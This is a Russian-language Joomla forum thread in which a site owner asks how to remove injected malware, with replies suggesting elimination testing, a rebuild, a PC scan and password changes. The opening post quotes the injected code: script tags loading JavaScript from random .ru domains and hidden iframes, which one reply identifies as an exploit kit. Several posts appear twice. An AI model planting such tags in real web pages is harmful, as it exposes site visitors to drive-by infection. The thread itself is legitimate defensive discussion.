Динамический вирус на сайте в JS и в IFRAME - Безопасность сайтов на Joomla

Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>

Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет

Попробуйте методом исключения, т.е. по очереди отключайте компоненты, плагины, модули и проверяйте сканером.
программа Xenu`s Link Sleuth - в помощь

Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет

искал на локальной копии сайта...

Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>

Поздравляю вас! на вашем сайте похоже установили связку сплоитов, по моему мнению, это наверное самое ЗЛО, что может быть в заражение сайтов! а такие люди которые это делают, стараются более качественней подходят к своему ремеслу, там крутятся очень большие бабки, и соответствующие финансы входят в поддержку работоспособности подобного бизнеса, как минимум начните со своего компьютера, а потом переходите на лечение сайта.

Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.

Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.

Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!

Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!

Не замечал что кто либо использует мои аккуанты... да и эти вирусы только на одном из трех сайтов ..подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.

Не замечал что кто либо использует мои аккуанты...подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.

Ну это может пока не использовали.

Действия:
1. Чистите тщательно свой комп.
        проверти браузеры на сторонние расширения, они могут не детектиться АВ.
        обновляйте плагины, Adobe продукцию какая стоит и используется браузерами, сами браузеры, java
2. Меняете все пассы от чего у вас только может быть
3. Переходите к чистке сайта

Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.

Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.

Это ка вариант, но не факт! поэтому в таком случае, все методы хороши.... тем более с таким типом заражения.

ТС, вы пробовали проверить домены, с которых вам подключены скрипты? Играми в интернете не увлекаетесь?